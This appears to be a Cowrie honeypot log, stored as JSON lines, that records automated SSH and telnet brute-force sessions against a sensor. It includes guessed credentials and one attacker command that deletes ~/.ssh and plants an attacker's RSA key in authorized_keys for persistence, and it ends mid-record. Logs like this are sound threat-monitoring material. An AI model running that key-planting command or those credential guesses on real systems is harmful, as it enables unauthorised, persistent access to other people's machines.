{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:01.257283Z","src_ip":"212.227.235.229","session":"88b3a6bf76ce"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:02.005049Z","src_ip":"212.227.235.229","session":"88b3a6bf76ce"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:03.257074Z","src_ip":"212.227.235.229","session":"88b3a6bf76ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60754,"dst_ip":"1.2.3.4","dst_port":22,"session":"1187f9299efa","protocol":"ssh","message":"New connection: 212.227.125.160:60754 (1.2.3.4:22) [session: 1187f9299efa]","sensor":"my-vps","timestamp":"2025-08-28T06:35:10.626783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:10.627452Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:10.861511Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:35:11.532667Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:12.058884Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:35:12.059599Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:12.293686Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:12.294893Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45620,"dst_ip":"1.2.3.4","dst_port":23,"session":"81830943c8b0","protocol":"telnet","message":"New connection: 212.227.235.229:45620 (1.2.3.4:23) [session: 81830943c8b0]","sensor":"my-vps","timestamp":"2025-08-28T06:35:16.298951Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50200,"dst_ip":"1.2.3.4","dst_port":22,"session":"8020eeec0ac6","protocol":"ssh","message":"New connection: 212.227.235.229:50200 (1.2.3.4:22) [session: 8020eeec0ac6]","sensor":"my-vps","timestamp":"2025-08-28T06:35:17.413386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:17.414297Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:17.659710Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:35:18.402656Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:18.913773Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:35:18.914461Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:19.161306Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:19.162687Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.session.connect","src_ip":"165.22.215.186","src_port":59174,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8d70652d0db","protocol":"ssh","message":"New connection: 165.22.215.186:59174 (1.2.3.4:22) [session: d8d70652d0db]","sensor":"my-vps","timestamp":"2025-08-28T06:35:24.453099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:35:24.454029Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:35:24.722677Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39744,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdd5b5bcc6ee","protocol":"telnet","message":"New connection: 212.227.125.160:39744 (1.2.3.4:23) [session: fdd5b5bcc6ee]","sensor":"my-vps","timestamp":"2025-08-28T06:35:25.118428Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty@2025","message":"login attempt [root/Qwerty@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:35:25.797797Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.closed","duration":10.000700235366821,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.299574Z","src_ip":"212.227.235.229","session":"81830943c8b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:26.426486Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.427175Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.428231Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.698237Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58484,"dst_ip":"1.2.3.4","dst_port":22,"session":"092eae6e4a41","protocol":"ssh","message":"New connection: 212.227.125.160:58484 (1.2.3.4:22) [session: 092eae6e4a41]","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.013096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.014266Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.230624Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:27.313778Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.314524Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.585422Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.586340Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.connect","src_ip":"165.22.215.186","src_port":54904,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff42cfeea6a2","protocol":"ssh","message":"New connection: 165.22.215.186:54904 (1.2.3.4:22) [session: ff42cfeea6a2]","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.856409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.857489Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.880596Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:35:28.113037Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:29.098762Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:29.206908Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.481654Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.session.connect","src_ip":"165.22.215.186","src_port":54916,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ef971c431d8","protocol":"ssh","message":"New connection: 165.22.215.186:54916 (1.2.3.4:22) [session: 0ef971c431d8]","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.731286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.732057Z","src_ip":"165.22.215.186","session":"0ef971c431d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.982812Z","src_ip":"165.22.215.186","session":"0ef971c431d8"}
{"eventid":"cowrie.login.success","username":"root